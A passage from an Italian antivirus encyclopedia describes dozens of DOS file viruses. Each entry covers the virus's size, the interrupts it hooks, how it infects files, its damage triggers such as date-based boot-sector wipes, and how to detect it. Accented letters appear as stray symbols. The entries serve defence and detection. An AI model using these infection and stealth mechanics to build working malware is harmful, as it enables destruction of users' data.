di 2.430-2.445 Byte. Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue il programma direttamente. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. 2) Prima di infettare i file, il virus intercetta l'INT 24h. in modo da ignorare errori I/O. Danni: Il virus possiede un contatore; dopo aver infettato un file, sottrae 1 al contatore. Quando il contatore Φ =0, il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 2.430-2.445Byte. [Exper-755] Nome del Virus: Exper-755. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 755 Byte. (Non infetta i file con estensione *.COM). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca un file con estensione *.EXE nella directory corrente. 2) Controlla che sia stato infettato. Se "SI",continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. Ripete la procedura fino a quando tutti i file con estensione *.COM nella directory corrente sono infettati. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 755 Byte. Note: 1) Non rimane in memoria. 2) Prima di infettare i file, il virus intercetta prima l'INT 24h. in modo da ignorare errori I/O. [Findm-695] Nome del Virus: Findm-695. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 695-710 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia stato infettato. Se "SI",continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 695-710 Byte. Note: 1) La porzione infettata dal virus non viene scritta correttamente. La maggiorparte dei file infetti non pu≥ essere eseguita (anche il virus non Φ in grado di infettare o di danneggiare). 2) Non rimane in memoria. 3) Prima di infettare i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [FR-1013] Nome del Virus: FR-1013. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM ed estensione *.EXE infetti aumentano di 1.013-1.028 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.013-1.028 Byte. [Harm-1082] Nome del Virus: Harm-1082. Tipo di Virus: Virus parassita Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1.082-1.097 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.082-1.097 Byte. [Hor-2248] Nome del Virus: Hor-2248. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM ed estensione *.EXE infetti aumentano di 2.248 Byte. Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: (Il virus non pu≥ girare in DOS 5.0). 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. 2) Prima di infettare i file, il virus intercetta l'INT 24h. in modo da ignorare errori I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 2.248 Byte. [Encroach2] Nome del Virus: Encroach2. Tipo di Virus: Virus parassita. Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (infetta un solo alla volta). Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Prima di infettare, il virus intercetta l'INT 24h in modo da ignorare errori I/O. [Encroach] Nome del Virus: Encroach Tipo di Virus: Virus parassita Vettore PC agganciato: INT 24h Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che il file sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (infetta un solo alla volta). Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Prima di infettare, il virus intercetta l'INT 24h in modo da ignorare errori I/O. [DWI] Nome del Virus: Dwi. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 1.050-1.070 Byte. (Non infetta i file con estensione *.COM). Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. 2) Prima di infettare i file, il virus intercetta l'INT 24h. in modo da ignorare errori I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.050-1.070 Byte. [Dennis] Nome del Virus: Dennis (possiede due varianti). Tipo di Virus: Virus parassita. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, lo infetta. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. Danni: Nessuno. [Comsysexe] Nome del Virus: Comsysexe (esistono diverse varianti). Tipo di Virus: Virus parassita. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. (File con estensione *.EXE, *.COM e *.SYS infetti). 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. Danni: Nessuno. [Cruncher] Nome del Virus: Cruncher. Tipo di Virus: Virus parassita. Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un programma non infetto, si infetta. 2) Prima di infettare i file, il virus intercetta l'INT 24h. in modo da ignorare errori I/O. Danni: Nessuno. [Ice-159] Nome del Virus: Ice-159. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 159 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta un solo alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 159 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Joker3] Nome del Virus: Joker3. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1.084 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, esegue direttamente il programma. Metodo di infezione: Il virus infetta i file da INT 21h. Quando viene eseguito l'INT 21h, sono infettati tutti i file con estensione *.COM nella directory corrente. Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un errore I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.084 Byte. [Mi-Nazi] Nome del Virus: Mi-Nazi. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1.084 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione (infetta un solo file alla volta). Danni: La parte del virus che determina l'infezione non Φ stata scritta correttamente. I file infetti non possono essere scritti normalmente (inoltre il virus non Φ in grado di infettare e danneggiare). Note: 1) Il virus infetta i file dall'INT 21h. Quando viene eseguito l'INT 21h, tutti i file con estensione *.COM nella directory corrente vengono infettati. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un errore I/O. [Tiny-143] Nome del Virus: Tiny-143. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file infetti con estensione *.COM aumentano di 143 Byte Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta un solo alla volta). Danni: Nessuno. Metodo di rilevazione: 1) I campi di data ed ora dei file infetti sono cambiati. 2) I file infetti aumentano di 143 Byte. [Smal-122B] Nome del Virus: Smal-122B. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file infetti con estensione *.EXE e *.COM aumentano di 122 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che sia giα in memoria. Se "NO", il virus si copia in "Absolute Address" 0000:0103h, intercetta l'INT21h e torna alla funzione originale. Se il programma da eseguire Φ un file con estensione *.COM o *.EXE ed il primo Byte non Φ E9h, il virus lo infetta. Note: Alcuni interrupt non possono essere eseguiti correttamente in quanto il virus Φ presente nell'area vettoriale. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 122 Byte. [Printmon] Nome del Virus: Printmon. Tipo di Virus: Virus da file. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 853 Byte. Vettore PC agganciato: INT 17h (funzione stampante) per cambiare i dati alla stampante. Procedura eseguita: Controlla che sia stato intercettato l'INT 17h. Se "NO", il virus esegue delle procedure di INT 17h per installarsi in memoria. Infetta tutti i file con estensione *.COM di lunghezza inferiore a 64.000 Byte nella directory corrente e ritorna alla funzione originale (durante il periodo di infezione, sospende l'INT 24h per evitare di lasciare delle tracce mentre scrive). Danni: Il virus causa errori all'invio di dati alla stampante. Note: Data ed ora dei file infetti non vengono cambiate. Metodo di rilevazione: Il file infetto aumenta di 853 Byte. [Tiny-124] Nome del Virus: Tiny-124. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 124 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che sia in memoria. Se "NO", il virus si copia in "Absolute Address" 0050:0103h, intercetta l'INT21h e torna alla funzione originale. Metodo di infezione: Se il programma eseguito Φ un file con estensione *.COM ed il suo primo Byte non Φ E9h, il virus procede alla sua infezione. Danni: I file con estensione *.COM vengono distrutti a causa di un susseguente danno di testa. Note: Alcuni interrupt non possono essere eseguiti correttamente in quanto il virus Φ presente nell'area vettoriale. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 124 Byte. [Smal-124] Nome del Virus: Smal-124. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 124 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che sia in memoria. Se "NO", si copia in "Absolute Address" 0050:0103h, intercetta l'INT21h e torna alla funzione originale. Metodo di infezione: Se il programma eseguito Φ un file con estensione *.COM, il virus procede alla sua infezione. Danni: Nessuno. Note: Alcuni interrupt non possono essere eseguiti correttamente in quanto il virus Φ presente nell'area vettoriale. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 124 Byte. [Troi2] Nome del Virus: Troi2. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 512 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che la data corrente sia il giorno 5/1/1992. Se "SI", ritorna direttamente alla funzione principale. Altrimenti, controlla che sia in memoria. Se "NO", il virus si copia in "Absolute Address" 0000:0200h (l'area per i vettori interrupt), intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia giα in memoria. 2) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Se il programma eseguito Φ un file con estensione *.EXE, il virus procede alla sua infezione. Danni: Nessuno. Note: Data ed ora dei file infetti non vengono cambiate. Metodo di rilevazione: I file infetti aumentano di 512 Byte. [Tver] Nome del Virus: Tver. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 308 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che sia giα in memoria. Se "NO", il virus si copia in "Absolute Address" 0000:0200h (l'area per i vettori interrupt), intercetta l'INT 21h e torna alla funzione originale. . Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia giα in memoria. 2) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Se il programma eseguito Φ un file con estensione *.COM ed il suo primo Byte Φ E9h, il virus procede alla sua infezione. Danni: Nessuno. Note: In molti virus il primo Byte del file Φ E9h. In molti casi, il virus lo corregge se non Φ E9h. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 308 Byte. [Wave] Nome del Virus: Wave. Tipo di Virus: In memoria (OS), Virus da file. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 454 Byte. Vettore PC agganciato: INT 21h, 1Ch. Procedura eseguita: Controlla che sia giα in memoria. Se "NO", il virus si copia in "Absolute Address" 0000:01ECh (l'area per i vettori interrupt), intercetta l'INT 21h e l'INT 1Ch e cambia l'indicatore dell'INT 78h con l'indirizzo indicato dall'originale INT 21h. Torna alla funzione originale. Metodo di infezione: INT 21h: 1) Intercetta l'INT 21h per controllare che sia giα in memoria. 2) Intercetta l'INT 21H (AH=4B, AH=3Dh) per infettare i file. Se il programma eseguito Φ un file con estensione *.COM, la lunghezza del programma e del virus combinate Φ compresa tra 1.500 e 64.000 Byte e si trova in drive C (eccetto drive A e drive B), il virus procede alla sua infezione. Altrimenti, pone un flag che viene sucessivamente usato dall'INT 1Ch. INT 1Ch: intercetta l'INT 1Ch per spostare lo schermo da un lato all'altro per 33 secondi, dopo che il flag si Φ impostato da INT 21h. Danni: Nessuno. Note: Data e ora (ad eccezione dell'anno dei file infetti) vengono cambiate. Non si pu≥ notare il cambiamento quando si usa in comando "Dir" in quanto gli ultimi 2 Byte della data non vengono cambiati (Si vedrebbe un ordine di organizzazione diverso se si attacca "/od" al comando "Dir"). Metodo di rilevazione: I file infetti aumentano di 454 Byte. [Zz1] Nome del Virus: Zz1. Tipo di Virus: Sovrascrive, Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 127 Byte. Procedura eseguita: Cerca un file con estensione *.COM non infetto nella directory corrente e procede alla sua infezione (infetta un solo file alla volta). Se non ci sono file da infettare, il virus cambia la data della RAM per impostare lo schermo a 81 linee. Danni: 1) Sovrascrive i primi 127 Byte dei file originali con il codice del virus. I file originali vengono distrutti. 2) Confonde lo schermo se non ci sono file infettabili. Note: Data ed ora dei file infetti non vengono cambiate. [Willow] Nome del Virus: Willow. Tipo di Virus: In memoria, Virus da file (file con estensione *.EXE). Lunghezza del Virus: 1.870 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che sia rimasto in memoria. Se "NO", intercetta l'INT 14h e cambia l'indicatore dell'INT FDh all'indirizzo indicato dall'INT 21h. Intercetta l'INT 21h. Terminate le operazioni si ricarica in memoria. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia giα in memoria. 2) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM, il virus lo cancella. Se Φ un file con estensione *.EXE, lo infetta. Danni: Cancella i file con estensione *.COM eseguiti mentre il virus Φ in memoria. Note: Data ed ora dei file infetti non vengono cambiate. Metodo di rilevazione: I file infetti aumentano di 1.870-1.885 Byte. [V-66] Nome del Virus: V-66. Tipo di Virus: Sovrascrive i file, Virus da file (tutti i file) Lunghezza del Virus: 66 Byte. Procedura eseguita: Infetta tutti i file nella directory corrente. Metodo di infezione: Cambia gli attributi dei file convertendoli in trascrivibili. Sovrascrive i primi 66 Byte con il codice del virus. Danni: Sovrascrive i file originali con il codice del virus. I file originali vengono distrutti (alterati). Metodo di rilevazione: Data ed ora dei file infetti vengono cambiate. [VCL-408] Nome del Virus: VCL408. Tipo di Virus: Overwrites, Virus da file. (File con estensione *.EXE e file con estensione *.COM). Lunghezza del Virus: 408 Byte. Procedura eseguita: Cerca un file con estensione *.EXE o con estensione *.COM non infetto in ogni cartella e procede alla sua infezione. Il virus registra che l'infezione iniziale abbia avuto successo. La successiva registrazione sovrascrive l'originale. L'ultima, Φ la registrazione dell'ultima infezione. Il virus la controlla prima che termini. Se la registrazione fallisce, il virus blocca il sistema. Danni: 1) I file sono inutilizzabili anche dopo essere stati infettati. 2) Occasionalmente blocca il sistema. Note: 1) Data ed ora dei file infetti rimangono invariate. 2) La lunghezza dei file infetti non cambia a meno che la lunghezza dei file originali sia inferiore a 408 Byte. In questo caso la lunghezza dei file infetti diventa di 408 Byte. [SUNDEVIL] Nome del Virus: SunDevil. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 691 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che la data corrente sia il giorno 8 maggio. Se "SI", distrugge il primo settore (settore di Boot) nel dischetto corrente. Compare il seguente messaggio e ripete la chiamata all'INT 05h. "There is no America. There is no Democracy. There is only IBM, ITT, and AT&T. This virus is dedicated to all that have been busted for computer-hacking activities. The SunDevil Virus (C) 1993 by Crypt Keepr [SUNDEVIL] " Oppure, il virus si copia in "Absolute Adress" 9000:0000h, intercetta l'INT21h e ritorna alla funzione originale. Metodo di infezione: Intercetta l'INT 21h (AH=3D,3E,56, AX=4300,4B00,4B01) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM, il virus procede alla sua infezione. Danni: Distrugge il settore di boot del dischetto corrente se la data corrente Φ il giorno 8 maggio. Note: Data ed ora dei file infetti non vengono cambiate. Metodo di rilevazione: 1) I file infetti aumentano di 691 Byte. 2) Il suddetto messaggio compare se si usa il comando "Type". [Skew-469] Nome del Virus: Skew-469. Tipo di Virus: In memoria (OS), Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 469 Byte. Vettore PC agganciato: INT 21h, INT 1Ch. Procedura eseguita: Controlla che sia in memoria. Se "NO", si copia in "Absolute Adress" 0000:0200h, intercetta l'INT21h e ritorna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21h (AX=4B00h or AH=3Dh) per infettare i file. Intercetta prima l'INT 24h per evitare di divulgare sue tracce mentre scrive. Controlla che il programma da eseguire sia un file con estensione *.EXE non infetto. Se "SI", procede alla sua infezione. Ripristina l'INT 24h. 2) Intercetta l'INT 1Ch. Aumenta di 1 il valore di un indirizzo, ogni volta che questo interrupt viene chiamato. Quando il valore equivale a FFFFh, il virus scrive il valore corrente alla scheda video facendo muovere lo schermo in su e in gi∙ o a destra e a sinistra. Danni: Causa il movimento dello schermo in su e in gi∙ o a destra e a sinistra Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 469-469+15 Byte. [Atas_400] Nome del Virus: Atas_400. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 400 Byte. Vettore PC agganciato: INT 24h (annulla la gestione degli errori gravi) Procedura eseguita: 1) Il virus decodifica, intercetta l'INT24h per prevenire la divulgazione di sue tracce mentre scrive, cambia la sua testa. 2) Cerca un file con estensione *.COM non infetto di lunghezza superiore a 255 Byte ma inferiore a 64.256 Byte. 3) Controlla la data del sistema. Se il campo dei secondi Φ inferiore a 3, compare il seguente messaggio: "I like to travel ...". Ripristina l'INT 24h e torna alla funzione principale. Danni: Nessuno. Note: 1) Infetta un solo file alla volta. 2) Data ed ora dei file infetti vengono cambiate. [DM-330] Nome del Virus: Dm-330. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 330 Byte. Vettore PC agganciato: INT 21h, 5Fh. Procedura eseguita: 1) Il virus decodifica e controlla che sia giα in memoria. Se "NO", si porta ad Absolute Adresse da 0000:0208h a 0000:0351h. 2) Intercetta l'INT21h e torna alla funzione principale. Metodo di infezione: 1) Intercetta l'INT 5Fh. 2) Intercetta l'INT 21h per infettare i file. Il virus si attiva quando il sistema chiamato INT 21h per eseguire un programma (AH=4Bh), cambia gli attributi del file (AH=43h), cambia il nome del file (AH=56h) oppure apre un file (AH=3Dh). Il virus controlla che il programma da eseguire sia un file con estensione *.COM non infetto. Se "SI", il virus procede alla sua infezione. Danni: Nessuno. Note: 1) Il virus Φ residente nell'area per i vettori interrupt. Questo causa un conflitto nella funzione del virus ed i vettori interrupt (indirizzo da 0000:0208h a 0000:0351h). 2) Data ed ora dei file infetti non vengono cambiate. [CLS] Nome del Virus: Cls. Tipo di Virus: In memoria, Virus da file. (File con estensione *.EXEe *.COM). Lunghezza del Virus: 835 Byte. Vettore PC agganciato: INT 21h, INT 08h, INT 13h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", si porta in memoria alta. 2) Intercetta l'INT 21h, INT 08h e l'INT 13h e ritorna alla funzione originale. Metodo di infezione: INT 21h: 1) Intercetta l'INT21h per controllare che sia in memoria. 2) Intercetta l'INT21h per infettare i file. Il virus si attiva quando il sistema chiamato INT21h esegue un programma (AH=4Bh). Controlla che il programma da eseguire sia un file con estensione *.COM non infetto e la sua lunghezza sia compresa tra 129 Byte e 64.512 Byte. Se "SI", procede alla sua infezione. INT 08h: Intercetta l'INT 08h (l'interrupt attivato ogni 1/18 di secondo). Ogni volta che viene richiamato questo interrupt, un contatore aumenta di 1. Quando questo contatore raggiunge 65.520 (circa un'ora dopo), il virus pulisce lo schermo. (Non ha effetti sul monocromatico perchΘ la funzione pulente scrive 00 da B800:0000h a B800:0FA0h). INT 13h: Intercetta l'INT 13h. Danni: Il virus pulisce lo schermo ogni ora. Note: Data ed ora dei file infetti non vengono cambiate. Metodo di rilevazione: I file infetti aumentano di 853 Byte. [Nouin] Nome del Virus: Nouin. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.EXE ed estensione *.COM). Lunghezza del Virus: 855 Byte. Vettore PC agganciato: INT 83h, 09h, 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h, INT 09h e l'INT 83h e torna alla funzione originale. (Il metodo che utilizza il virus per caricarsi in memoria Φ abbastanza rudimentale. Necessita dell'ultimo MCB controllato dal DOS nell'indirizzo, quando carica il programma eseguito). Metodo di infezione: 1) Intercetta l'INT 83h per valutare che il virus sia in memoria 2) Intercetta l'INT 09h per diminuire di 1 un contatore, ogni volta che viene premuto un tasto. Colloca il flag di danneggiamento quando il valore raggiunge zero. 3) Intercetta l'INT 21h (AH=3Dh,aH=43h,AX=4B00h). Controlla che il programma da eseguire sia un file con estensione *.EXE o *.COM non infetto (salta SCAN.EXE e CLEAN.EXE). Se si tratta di un file con estensione *.COM, il virus controlla che il file sia di lunghezza superiore a 60.000. Se "SI", il virus lo infetta. Controlla che il damage_flag sia collocato. Se "SI", il virus verifica che la data corrente sia il giorno 11 novembre o 30 novembre. Se "SI", distrugge i settori da 1 a 9 nel dischetto corrente. Danni: Dopo che il virus Φ in memoria, che la tastiera Φ stata premuta un certo numero di volte o che la data corrente corrisponde al giorno 11 o 30 novembre, distrugge i settori da 1 a 9 nel dischetto corrente. Note: Data ed ora dei file infetti non vengono cambiate. Metodo di rilevazione: I file infetti aumentano di 855 Byte. [V-550] Nome del Virus: V-550. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 550 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Il virus controlla che sia in memoria ed il blocco di memoria che carica nel programma corrente sia l'ultimo MCB. Se "SI", si porta nella memoria alta. 2) Intercetta l'INT21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia in memoria. 2) Intercetta l'INT 21h per controllare che il programma che viene eseguito sia un file con estensione *.EXE non infetto. Se "SI", il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di circa 550 Byte. 3) La memoria totale diminuisce di 39 Byte dopo che il virus Φ in memoria. [Angarsk] Nome del Virus: Angarsk. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 238 Byte. Procedura eseguita: Cerca tutti i file con estensione *.COM non infetti nelle directory corrente e principale e li infetta (la lunghezza dei file infettabili deve essere inferiore a 32.768 Byte). Danni: Nessuno. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di circa 238 Byte. [Enet-613] Nome del Virus: Enet-613. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 613 Byte. Procedura eseguita: 1) Infetta tutti i file con estensione *.COM nella directory corrente. (Non infetta nuovamente lo stesso file). 2) Controlla che il giorno corrente sia domenica. Se "SI", compare un messaggio ed attende che venga premuto un tasto. 3) Cambia una parola all'indirizzo 4000:0013h della RAM in 0200h. 4) Chiama l'INT 19h per riavviare il sistema. Danni: Nessuno. Note: 1) Data ed ora dei file infetti non vengono cambiate. 2) I file infetti aumentano in lunghezza di 613-628 Byte. [Fri-13D] Nome del Virus: Fri-13-D. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 416 Byte. Procedura eseguita: 1) Quando viene eseguito un programma infetto, il virus infetta tutti i file con estensione *.COM (tranne COMMAND.COM) nella directory corrente. (Non infetta nuovamente lo stesso file). 2) Controlla che il giorno corrente sia venerd∞ 13. Se "SI", si cancella e ritorna alla funzione originale. Danni: Un programma infetto si cancella se si utilizza il computer il giorno venerd∞ 13. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 416-431 Byte. [Ash] Nome del Virus: Ash. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 280 Byte. Procedura eseguita: Infetta tutti i file con estensione *.COM infettabili nella directory corrente. (Non infetta nuovamente lo stesso file ed i file pi∙ lunghi di 64.768). Se il numero dei i file infetti recenti Φ inferiore a 2, il virus ricerca file infettabili nella propria directory e in quella superiore. Danni: Nessuno. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) I file infetti aumentano di 280 Byte. [Bljec-1] Nome del Virus: Bljec-1. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 301 Byte. Procedura eseguita: Controlla che il mese corrente sia settembre. Se "SI", formatta i primi 16 settori del dischetto corrente ed infetta tutti i file con estensione *.COM nella directory corrente. Danni: Formatta i primi 16 settori del dischetto corrente se il mese corrente Φ settembre. Metodo di rilevazione: 1) Data ed ora dei file infetti non vengono cambiate. 2) I file infetti aumentano di 301 Byte. [Cas-927] Nome del Virus: Cas-927. Tipo di Virus: In memoria (Memoria alta), Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 3+927 Byte. Vettore PC agganciato: INT 21h, 1Ch, 28h. Procedura eseguita: 1) Il virus decodifica. 2) Controlla che sia giα in memoria. Se "NO", si carica nella memoria alta. 3) Intercetta l'INT 21h, INT 1Ch e l'INT 28h e torna alla funzione originale. Metodo di infezione: INT 21h: 1) Intercetta l'INT 21h per controllare che sia giα in memoria. 2) Intercetta l'INT 21h (AX=4B00h) per infetare i file. Se il programma eseguito Φ un file con estensione *.COM non infetto minore di 63.500 Byte, il virus lo infetta. INT 28h: Intercetta l'INT 28h per controllare che il mese corente sia un mese pari, che il giorno sia domenica, marted∞, gioved∞ o sabato e che l'ora sia 11:11:11. Se tutte queste condizioni vengono soddisfatte, imposta un flag di danneggiamento per essere usato dall'INT 1ch. INT 1Ch: Intercetta l'INT 1Ch per cooperare con l'INT 28h. Se il flag di daneggiamento Φ impostato, il virus cambia tutte le lettere maiuscole presenti sullo schermo in lettere minuscole. Danni: Nessuno. Note: 1) Il virus Φ nella memoria alta (usa 7A Byte-pairs). 2) I file infetti aumentano di 855 Byte. 3) Data ed ora dei file infetti non variano. [CSFK] Nome del Virus: Csfk. Tipo di Virus: In memoria (MCB), Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 5+918 Byte. Vettore PC agganciato: INT 